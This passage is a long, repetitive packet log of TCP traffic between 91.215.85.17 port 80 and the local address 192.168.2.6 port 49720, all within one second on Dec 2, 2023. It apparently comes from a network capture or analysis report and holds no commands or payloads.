                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240341902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240349054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240376949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240411997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240413904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240447044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240480900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240483046 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240515947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240550995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240554094 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240592003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240629911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240636110 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240664959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240700006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240709066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240736008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240772009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240782976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240807056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240842104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240859985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240879059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240914106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240916967 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240951061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240988970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240993023 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241024971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241063118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241067886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241099119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241132975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241134882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241167068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241202116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241203070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241239071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241297007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241301060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241334915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241374969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241377115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241415977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241451025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241455078 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241487026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241520882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241525888 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241556883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241591930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241595030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241626978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241663933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241664886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241700888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241738081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241738081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241775036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241810083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241833925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241844893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241880894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241883993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241916895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241951942 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241952896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.241988897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242023945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242024899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242059946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242095947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242096901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242130995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242165089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242172003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242201090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242235899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242244005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242275953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242314100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242315054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242350101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242386103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242392063 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242422104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242458105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242460012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242492914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242527008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242527962 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242563963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242605925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242635012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242641926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242681026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242685080 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242716074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242750883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242754936 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242786884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242821932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242834091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242860079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242893934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242896080 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242928982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242964029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242964983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.242999077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243035078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243037939 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243069887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243105888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243110895 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243154049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243191004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243196011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243226051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243275881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243278027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243313074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243351936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243371964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243386984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243422031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243424892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243457079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243491888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243493080 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243527889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243562937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243565083 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243598938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243635893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243638039 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243670940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243705988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243737936 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243741035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243777037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243779898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243812084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243846893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243849039 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243881941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243916988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243917942 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243952036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243987083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.243988991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244023085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244055986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244057894 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244092941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244127989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244138956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244163036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244196892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244199038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244235039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244270086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244273901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244307041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244345903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244345903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244379997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244415045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244415998 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244448900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244482040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244483948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244523048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244556904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244564056 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244591951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244632006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244637966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244667053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244702101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244707108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244736910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244772911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244775057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244807959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244843006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244846106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244879007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244915009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244918108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244951010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244987011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.244988918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245022058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245055914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245064020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245090961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245126009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245126963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245162964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245198011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245201111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245234966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245279074 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245285988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245323896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245358944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245366096 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245394945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245429993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245434046 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245465040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245500088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245501995 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245536089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245570898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245572090 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245606899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245644093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245646954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245678902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245713949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245721102 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245748043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245783091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245783091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245817900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245852947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245884895 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245888948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245925903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245929956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245960951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.245999098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246001959 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246033907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246068954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246093035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246103048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246139050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246154070 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246176004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246211052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246213913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246248007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246284008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246299028 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246320009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246355057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246356010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246390104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.246427059 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.251805067 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.454068899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.454138041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.454210043 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.471952915 CET804972091.215.85.17192.168.2.6
